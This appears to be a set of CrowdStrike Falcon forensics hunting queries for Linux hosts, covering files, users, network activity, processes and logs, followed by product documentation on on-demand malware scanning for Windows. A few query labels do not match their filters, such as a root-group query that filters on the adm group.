#event_simpleName=FileEntry ForensicsCollectionIdentifier= * FileEntrySourceType=FILE_SYSTEM_CONFIG | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

System stop configs

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * FileEntrySourceType=FILE_SYSTEM_STOP | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

Kernel modules

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * FileEntrySourceType=FILE_KERN_MODULES | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

FirewallRules

FirewallRuleIP4

#event_simpleName=FirewallRuleIP4 ForensicsCollectionIdentifier=*
| ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds)
| time := formatTime("%F %T", field=ContextTimeStamp)
| table([time, aid, ForensicsCollectionIdentifier, Protocol, FirewallAction, LocalAddressIP4, RemoteAddressIP4, NegateLocalAddress, NegateRemoteAddress, IcmpCode, IcmpType, LocalPortRangeStart, LocalPortRangeEnd, RemotePortRangeStart, RemotePortRangeEnd, RuleOrder, RuleTable, NFTRuleTable, RuleChain], limit=max)

FirewallRuleIP6

#event_simpleName=FirewallRuleIP6 ForensicsCollectionIdentifier=*
| ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds)
| time := formatTime("%F %T", field=ContextTimeStamp)
| table([time, aid, ForensicsCollectionIdentifier, Protocol, FirewallAction, LocalAddressIP6, RemoteAddressIP6, NegateLocalAddress, NegateRemoteAddress, IcmpCode, IcmpType, LocalPortRangeStart, LocalPortRangeEnd, RemotePortRangeStart, RemotePortRangeEnd, RuleOrder, RuleTable, NFTRuleTable, RuleChain], limit=max)

FileDescriptorMonitor

Show all fields for ProcessOpenedFileDescriptor

#event_simpleName=ProcessOpenedFileDescriptor ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, ContextTimeStamp, RawProcessId, FileDescriptor, TargetFileName, FileOffset, Flags, MountNamespaceUniqueId, FileDescriptorType, EventFDCount, SignalMask, FanotifyFlagsArgument, FanotifyEventFlagsArgument, ClockId, Ticks, SettimeFlagsOctalString, SecondsUntilNextTick, NanosecondsUntilNextTick, IntervalSeconds, IntervalNanoseconds, SecondsInInterval, NanosecondsInInterval, SecondsUntilNextTimerExpiration, NanosecondsUntilNextTimerExpiration, TicksOccurred, ClockIdentifier, EventFDCounter, FileInode], limit=max)

FileInfo

Show all Fields

#event_simpleName=FileInfo ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FfcFileIdentifier, TargetFileName, Size, UserName, MD5HashData, SHA1HashData, SHA256HashData, FileHeader, UnixGroupName, UnixMode, PosixFileType, UserSecurityDomain, TargetFileExtension, CompanyName, ImageInternalName, FileDescription, FileVersion, FileLegalCopyRight, CertificateExists, OriginalFilename, ProductName, ProductVersion], limit=max)

All files in /tmp/

#event_simpleName=FileInfo ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | TargetFileName = "*/tmp/*" | table([time, aid, ForensicsCollectionIdentifier, TargetFileName, Size, UserName, SHA256HashData, UnixMode])

Search for the existence of /etc/rc.modules

#event_simpleName=FileInfo ForensicsCollectionIdentifier=* | TargetFileName= regex(\/etc\/rc.modules*) | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, TargetFileName, Size, UserName, SHA256HashData, UnixMode])

Important: The existence of this file is rare and warrants further investigation. This file is used to explicitly load kernel modules at boot time. For more info, see https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/5/html/deployment_guide/s1-kernel-modules-persistant.

Identify large files

#event_simpleName=FileInfo TargetFileName=*.tar OR TargetFileName=*.zip OR TargetFileName=*.gzip OR TargetFileName=*.part OR TargetFileName=*.tar.gz OR TargetFileName=*.gz OR TargetFileName=*.rar OR TargetFileName=*.tgz OR TargetFileName=*.bz2 NOT TargetFileName=*.log | Size > 999999999 | table([time,aid, ForensicsCollectionIdentifier, ContextTimeStamp, TargetFileName, Size, UserName, SHA256HashData, UnixMode], limit=max)

FileTimestampMetadata

Show all Fields

#event_simpleName=FileTimestampMetadata ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, FfcFileChangeType, FfcFileIdentifier, PosixFileType, TargetFileName, aid, ForensicsCollectionIdentifier], limit=max)

Show most accessed directories

#event_simpleName=FileTimestampMetadata ForensicsCollectionIdentifier = * | FfcFileChangeType=CHANGE_ACCESSED | PosixFileType = DIRECTORY | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | groupby([FilePath], function=[collect([aid]), count(FilePath)], limit=max)

FsVolumeMounted

Show All Fields

#event_simpleName=FsVolumeMounted ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, Flags,VolumeBusName, VolumeBusPath, VolumeDeviceModel, VolumeDevicePath, VolumeDeviceProtocol, VolumeDeviceRevision, VolumeDeviceInternal, VolumeDeviceVendor, VolumeIsNetwork, VolumeMediaBSDName, VolumeMediaBSDMajor, VolumeMediaBSDMinor, VolumeMediaBSDUnit, VolumeMediaContent, VolumeMediaEjectable, VolumeMediaName, VolumeMediaUUID, VolumeMediaSize, VolumeMediaWhole, VolumeMediaWritable, VolumeMountPoint, VolumeSectorSize], limit=max)

Show Fields Matching Volume Type

#event_simpleName=FsVolumeMounted ForensicsCollectionIdentifier=* VolumeType= <Voulumetype> | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, Flags,VolumeBusName, VolumeBusPath, VolumeDeviceModel, VolumeDevicePath, VolumeDeviceProtocol, VolumeDeviceRevision, VolumeDeviceInternal, VolumeDeviceVendor, VolumeIsNetwork, VolumeMediaBSDName, VolumeMediaBSDMajor, VolumeMediaBSDMinor, VolumeMediaBSDUnit, VolumeMediaContent, VolumeMediaEjectable, VolumeMediaName, VolumeMediaUUID, VolumeMediaSize, VolumeMediaWhole, VolumeMediaWritable, VolumeMountPoint, VolumeSectorSize], limit=max)

Note: Replace VOLUMETYPE with type of volume, such as tmpfs.

GroupAccount

Show all Fields

#event_simpleName=GroupAccount ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | parseInt("GID") | table([time, aid, ForensicsCollectionIdentifier, GID, UnixGroupName, GroupMemberUIDs], limit=max)

Users in group sudo

#event_simpleName=GroupAccount UnixGroupName=sudo ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, GID, UnixGroupName, GroupMemberUIDs], limit=max)

Users in group root

#event_simpleName=GroupAccount UnixGroupName=adm ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, GID, UnixGroupName, GroupMemberUIDs], limit=max)

The UIDs returned can be queried using the UserAccount event for further user account information. For example:

#event_simpleName=UserAccount collection= <collectionid> UID= <UID of interest>

InstalledApplication

Show all Fields

#event_simpleName=InstalledApplication ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | InstallDate := parseTimeStamp(field=InstallDate, format=seconds) | InstallDate := formatTime("%F %T", field=InstallDate) | BatchTimestamp := parseTimeStamp(field=BatchTimestamp, format=seconds) | BatchTimestamp := formatTime("%F %T", field=BatchTimestamp) | table([InstallDate, time, batchTime, aid, cid, ForensicsCOllectionIdentifier, AppName, AppVersion, AppIdentificationData, AnnotationData, AppArchetecture, AppPath, AppPathFlag, AppProvider, AppType, BatchDataNumber, BatchDataTotal, UpdateFlag], limit=max)

Show results for a specific installed app of interest

#event_simpleName=InstalledApplication ForensicsCollectionIdentifier=* | AppName= <app name> | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | InstallDate := parseTimeStamp(field=InstallDate, format=seconds) | InstallDate := formatTime("%F %T", field=InstallDate) | BatchTimestamp := parseTimeStamp(field=BatchTimestamp, format=seconds) | BatchTimestamp := formatTime("%F %T", field=BatchTimestamp) | table([time, aid, cid, InstallDate, batchTime, aid, cid, ForensicsCOllectionIdentifier, AppName, AppVersion, AppIdentificationData, AnnotationData, AppArchetecture, AppPath, AppPathFlag, AppProvider, AppType, BatchDataNumber, BatchDataTotal, UpdateFlag], limit=max)

KernelModeLoadImage

Show all Fields

#event_simpleName=KernelModeLoadImage ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, ImageModuleName, ParameterList, ContextProcessId, ContextThreadId, TargetProcessId], limit=max)

Show Results for a specific image module by name

#event_simpleName=KernelModeLoadImage ForensicsCollectionIdentifier=* ImageModuleName= <Image Module Name> | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, ImageModuleName, ParameterList, ContextProcessId, ContextThreadId, TargetProcessId], limit=max)

LocalIpAddressIp4

Show all Fields

#event_simpleName=LocalIpAddressIP4 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, AddressFamily, InterfaceAlias, IfType, InterfaceDescription, InterfaceIdentifier, InterfaceIndex, LocalAddressIP4, NetLuidIndex, NetworkInterfaceGuid, PhysicalAddress, PermanentPhysicalAddress, PhysicalAddressLength], limit=max)

LocalIpAddressIp6

Show all Fields

#event_simpleName=LocalIpAddressIP6 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, AddressFamily, InterfaceAlias, IfType, InterfaceDescription, InterfaceIdentifier, InterfaceIndex, LocalAddressIP6, NetLuidIndex, NetworkInterfaceGuid, PhysicalAddress, PermanentPhysicalAddress, PhysicalAddressLength], limit=max)

LogEntry

Show all Fields

#event_simpleName=LogEntry ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FfcLogConfidenceInterval, FfcLogOrigin, FfcLogSourceType, ForensicsText, FfcStructuredLogEntry], limit=max)

Show all logs in /var/logs directory

#event_simpleName=LogEntry ForensicsCollectionIdentifier=* FfcLogOrigin = "/var/log/*" | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FfcLogConfidenceInterval, FfcLogOrigin, FfcLogSourceType, ForensicsText, FfcStructuredLogEntry], limit=max)

Show UTMP log records with attributes

#event_simpleName=LogEntry ForensicsCollectionIdentifier=* | FfcLogSourceType = LOG_UTMPRECORD | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FfcLogConfidenceInterval, FfcLogOrigin, FfcLogSourceType, ForensicsText, FfcStructuredLogEntry], limit=max)

Show all but UTMP log records

#event_simpleName=LogEntry ForensicsCollectionIdentifier=* | NOT FfcLogSourceType = LOG_UTMPRECORD | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FfcLogConfidenceInterval, FfcLogOrigin, FfcLogSourceType, ForensicsText, FfcStructuredLogEntry], limit=max)

Show Linux audit logs

#event_simpleName=LogEntry ForensicsCollectionIdentifier=* | FfcLogSourceType = LOG_LINUXAUDIT | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FfcLogConfidenceInterval, FfcLogOrigin, FfcLogSourceType, ForensicsText, FfcStructuredLogEntry], limit=max)

Show syslogs

#event_simpleName=LogEntry ForensicsCollectionIdentifier=* FfcLogOrigin = "/var/log/syslog*" | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FfcLogConfidenceInterval, FfcLogOrigin, FfcLogSourceType, ForensicsText, FfcStructuredLogEntry], limit=max)

NetworkCloseIP4

Show all Fields

#event_simpleName=NetworkCloseIP4 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP4, RemotePort, LocalAddressIP4, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

NetworkCloseIP6

Show all Fields

#event_simpleName=NetworkCloseIP6 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP6, RemotePort, LocalAddressIP6, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

NetworkConnectIP4

Show all Fields

#event_simpleName=NetworkConnectIP4 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP4, RemotePort, LocalAddressIP4, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

NetworkConnectIP6

Show all Fields

#event_simpleName=NetworkConnectIP6 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP6, RemotePort, LocalAddressIP6, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

NetworkListenIP4

Show all Fields

#event_simpleName=NetworkListenIP4 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP4, RemotePort, LocalAddressIP4, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

NetworkListenIP6

Show all Fields

#event_simpleName=NetworkListenIP6 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP6, RemotePort, LocalAddressIP6, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

NetworkReceiveAcceptIP4

Show all Fields

#event_simpleName=NetworkReceiveAcceptIP4 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP4, RemotePort, LocalAddressIP4, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

NetworkReceiveAcceptIP6

Show all Fields

#event_simpleName=NetworkReceiveAcceptIP6 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP6, RemotePort, LocalAddressIP6, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

OsVersionInfo

Show all Fields

 #event_simpleName=OsVersionInfo ForensicsCollectionIdentifier=*
| ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds)
| time := formatTime("%F %T", field=ContextTimeStamp)
| default(field=[AgentVersion], value="No Sensor Installed", replaceEmpty=true)
| table([time, MajorVersion, MinorVersion, OSVersionString, OSVersionFileName, OSVersionFileData, PlatformId, ProductName, ProductType, AgentVersion, SystemTimeZone], limit=max)

ProcessOpenedFileDescriptor

Show all fields for FileDescriptorMonitor

#event_simpleName=FileDescriptorMonitor ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, ContextTimeStamp, RawProcessId, FileDescriptor, MonitoredFileDescriptor, MonitoredFileDescriptorDataString, FileInode, Flags, WatchDescriptor, TargetDeviceId, EventsMask, IgnoredMask, FileHandleSize, FileHandleTypeNumber, FileHandleHexString, FileDescriptorType, FileHandleSizeInBytes, TargetDeviceIdentifier], limit=max)

ProcessRollup2

Show all Fields

#event_simpleName=ProcessRollup2 ForensicsCollectionIdentifier=* | ProcessStartTime := parseTimeStamp(field=ProcessStartTime, format=seconds) | ProcessStartTime := formatTime("%F %T", field=ProcessStartTime) | table([ProcessStartTime, aid, ForensicsCollectionIdentifier, ProcessStartTime, RawProcessId, ImageFileName, CommandLine, EnvironmentVariables, CurrentWorkingPath, ProcessPriority, ProcessThreadCount, ProcessNiceValue, VirtualMemorySize, RGID, RSS, RUID, RawProcessID, SVGID, SVUID, TtyName, UID], limit=max)

Search for process information with a command line of interest

#event_simpleName=ProcessRollup2 ForensicsCollectionIdentifier=* CommandLine=<CommandLine of interest> | ProcessStartTime := parseTimeStamp(field=ProcessStartTime, format=seconds) | ProcessStartTime := formatTime("%F %T", field=ProcessStartTime) | table([ProcessStartTime, aid, cid, ForensicsCollectionIdentifier, ProcessStartTime, RawProcessId, ImageFileName, CommandLine, EnvironmentVariables, CurrentWorkingPath, ParentProcessID, ProcessPriority, ProcessThreadCount, ProcessNiceValue, ResidentSetSize, VirtualMemorySize, GID, RGID, RSS, RUID, SVGID, RawProcessID, SVGID, SVUID, TtyName, ControllingTerminal, UID], limit=max)

Search for process information with an image file name of interest

#event_simpleName=ProcessRollup2 ForensicsCollectionIdentifier=* ImageFileName=<ImageFileName of interest) | ProcessStartTime := parseTimeStamp(field=ProcessStartTime, format=seconds) | ProcessStartTime := formatTime("%F %T", field=ProcessStartTime) | table([ProcessStartTime, aid, cid, ForensicsCollectionIdentifier, ProcessStartTime, RawProcessId, ImageFileName, CommandLine, EnvironmentVariables, CurrentWorkingPath, ParentProcessID, ProcessPriority, ProcessThreadCount, ProcessNiceValue, ResidentSetSize, VirtualMemorySize, GID, RGID, RSS, RUID, SVGID, RawProcessID, SVGID, SVUID, TtyName, ControllingTerminal, UID], limit=max)

The RawProcessID returned per process can be queried using the Network* and RawBind* events for network data related to a specific process. For example:

#event_simpleName=Network* ForensicsCollectionIdentifier= <collectionid> ContextProcessId= <Context Process ID> ImageFileName= <ImageFileName of interest> | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table ([aid, ForensicsCollectionIdentifier, RemoteAddressIP4, RemoteAddressIP6, RemotePort, LocalAddressIP4, LocalAddressIP6, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, ContextProcessId, ContextThreadId, InContext], limit=max)

RawBindIP4

Show all Fields

#event_simpleName=RawBindIP4 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, RemoteAddressIP4, RemotePort, LocalAddressIP4, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, RawProcessId, InContext, FfcNetworkState], limit=max)

RawBindIP6

Show all Fields

#event_simpleName=RawBindIP6 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, RemoteAddressIP6, RemotePort, LocalAddressIP6, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, RawProcessId, InContext, FfcNetworkState], limit=max)

RouteIP4

Show all Fields

#event_simpleName=RouteIP4 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, Protocol, DefaultGatewayIP4, DefaultGatewayPhysicalAddress, RemoteAddressIP4, InterfaceAlias, InterfaceIndex, IpEntryFlags, RouteType, RouteAge, RouteMetric, RemoteAddressMaskIP4, NetLuidIndex], limit=max)

IPv4 remote connections

#event_simpleName=RouteIP4 ForensicsCollectionIdentifier=* RemoteAddressIP4!="0.0.0.0" OR RemoteAddressIP4!="" | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, Protocol, DefaultGatewayIP4, DefaultGatewayPhysicalAddress, RemoteAddressIP4, InterfaceAlias, InterfaceIndex, IpEntryFlags, RouteType, RouteAge, RouteMetric, RemoteAddressMaskIP4, NetLuidIndex], limit=max)

RouteIP6

Show all Fields

#event_simpleName=RouteIP6 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, Protocol, DefaultGatewayIP6, DefaultGatewayPhysicalAddress, RemoteAddressIP6, InterfaceAlias, InterfaceIndex, IpEntryFlags, RouteType, RouteAge, RouteMetric, RemoteAddressMaskIP6, NetLuidIndex], limit=max)

IPv6 remote connections

#event_simpleName=RouteIP6 ForensicsCollectionIdentifier=* RemoteAddressIP6!="0.0.0.0" OR RemoteAddressIP6!="" | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, Protocol, DefaultGatewayIP6, DefaultGatewayPhysicalAddress, RemoteAddressIP6, InterfaceAlias, InterfaceIndex, IpEntryFlags, RouteType, RouteAge, RouteMetric, RemoteAddressMaskIP6, NetLuidIndex], limit=max)

UserAccount

Show all Fields

#event_simpleName=UserAccount ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | PasswordLastSet := parseTimeStamp(field=PasswordLastSet, format=seconds) | PasswordLastSet := formatTime("%F %T", field=PasswordLastSet) | table([time, aid, ForensicsCollectionIdentifier,UID, UserName, UserRealName, UserIsAdmin, HomeDirectory, PasswordLastSet, GID, UserMemberGIDs], limit=max)

Show all fields for UserAccountDeleted

#event_simpleName=UserAccountDeleted ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, UserName, UID, UserRealName], limit=max)

Show all Users

#event_simpleName=UserAccount ForensicsCollectionIdentifier=* GID=0 | PasswordLastSet := parseTimeStamp(field=PasswordLastSet, format=seconds) | PasswordLastSet := formatTime("%F %T", field=PasswordLastSet) | table([UID, UserName, UserRealName, HomeDirectory, PasswordLastSet, GID, UserMemberGIDs], limit=max)

Show users in root group

#event_simpleName=UserAccount ForensicsCollectionIdentifier=* GID=0 | PasswordLastSet := parseTimeStamp(field=PasswordLastSet, format=seconds) | PasswordLastSet := formatTime("%F %T", field=PasswordLastSet) | table([UID, UserName, UserRealName, UserIsAdmin, HomeDirectory, PasswordLastSet, GID, UserMemberGIDs], limit=max)

Show users with admin level privileges

#event_simpleName=UserAccount ForensicsCollectionIdentifier=* UserIsAdmin=1 | PasswordLastSet := parseTimeStamp(field=PasswordLastSet, format=seconds) | PasswordLastSet := formatTime("%F %T", field=PasswordLastSet) | table([UID, UserName, UserRealName, UserIsAdmin, HomeDirectory, PasswordLastSet, GID, UserMemberGIDs], limit=max)

YARA

Show all fields for FfcBytePatternScanResult

#event_simpleName=FfcBytePatternScanResult ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FfcScanId, FfcScanType, FfcScanResult, FfcScanRuleName, ImageFileName, TargetFileName, MD5HashData, SHA1HashData, SHA256HashData], limit=max)

On-Demand Scanning

Create on-demand scans that detect and quarantine PE files that contain dormant malware.

On-Demand Scanning

CrowdStrike Falcon on-demand scanning can detect and quarantine portable executable (PE) files, such as .exe and .dll files, that contain dormant malware before they execute on Windows hosts. Run scans either immediately or according to a schedule that you specify.

Requirements

Subscription: Falcon Prevent
Sensor support: Falcon sensor for Windows 6.48 and later
- Note: Glob syntax in scan file paths is supported in Falcon sensor for Windows 6.51 and later
Host system requirements: Any host running a Falcon-supported version of Windows, including virtual hosts
Roles:
- Falcon Administrator, Falcon Security Lead, Falcon Investigator, and Falcon Analyst can create and run scans from the Falcon console
- Falcon Analyst - Read Only can view scan results in the Falcon console
- End users can run scans and view scan results on the local host if enabled by policy
CrowdStrike clouds: Available in all clouds

Before you begin

Before you create individual on-demand scans, configure prevention policy settings for on-demand scans. Settings at the prevention policy level control behavior for scans that are initiated by end users on a local host and for scans that are triggered by USB device insertion on a local host. For more info, see On-Demand Scans category.

Understanding on-demand scanning

When an on-demand scan is initiated on a Windows host, the file paths that you specified are scanned for malicious PE files. Depending on your settings, malicious files can be quarantined.

For Windows sensors earlier than 6.51, scans must be defined with absolute paths. Subfolders are automatically included in these scans.

For Windows sensors 6.51 and later, scans can be defined with either glob expressions or absolute paths. If you want all subfolders to be included in these scans, you must end the absolute file path with the glob wildcard **.

Falcon users can manage scans and view scan results through the Falcon console and through the CrowdStrike API.

End users can run scans and view scan results on their local hosts through a right-click menu.

A command-line interface (CLI) can optionally be invoked on the local host to initiate scans and view scan results. For more info, see On-demand scanning CLI.

Depending on how you configure your prevention policies and scan-specific settings, scans can be initiated in these ways:

Initiated from	Description
Falcon console	Based on a configuration or an action in the Falcon console, a scan is initiated on the host, either immediately or according to a specified schedule.
CrowdStrike API	Based on a configuration in the CrowdStrike API, a scan is initiated on the host, either immediately or according to a specified schedule.
USB insertion	When a USB storage device is inserted, a scan of the USB device is initiated immediately on the host.
End user	On a local host, through the right-click menu, an end user initiates a scan that runs immediately on that host.
CLI	A scan is initiated on a local host through the CLI.

File quarantining

For scans that are initiated through the Falcon console or the CrowdStrike API, quarantine actions are determined by your configuration settings for each individual scan. For more info, see Create a scan.

For scans that are initiated by an end user or triggered by a USB device insertion, quarantine actions are determined by prevention policy settings. To disable file quarantining, set the Prevention slider to Disabled. For more info, see On-Demand Scans Machine Learning.

Files that were quarantined from a USB device and then subsequently released by a Falcon administrator are added to C:\ProgramData\CrowdStrike on the local host.

Immediate versus scheduled scans

When you create a scan, you specify whether you want the scan to run immediately or at a scheduled time.

A scheduled scan can run once or on a recurring interval that you specify. A scheduled scan runs within 15 minutes of the specified start time in each host’s local time zone. To help prevent network load issues when multiple hosts are scheduled to be scanned at the same time, the actual scan start times are staggered. For example, if you scheduled a scan with a start time of 9:00 AM, the scans of individual hosts in the specified group would start sometime between 8:45 AM and 9:15 AM.

Note: Scheduled scans can only be set for a future date and time. When scheduling a scan, consider the host's time zone. If a host is in a time zone ahead of your time zone, the sensor may ignore the scan if it appears to be scheduled for a time that has already passed in the host's local time zone.

When you create a scan, you can specify a maximum duration. A running scan automatically stops if the specified limit is reached, and the scan is labeled as Incomplete in the scan log.

Immediate scans can be configured for individual hosts or host groups. Scheduled scans can be configured for only host groups.

Performance and CPU utilization

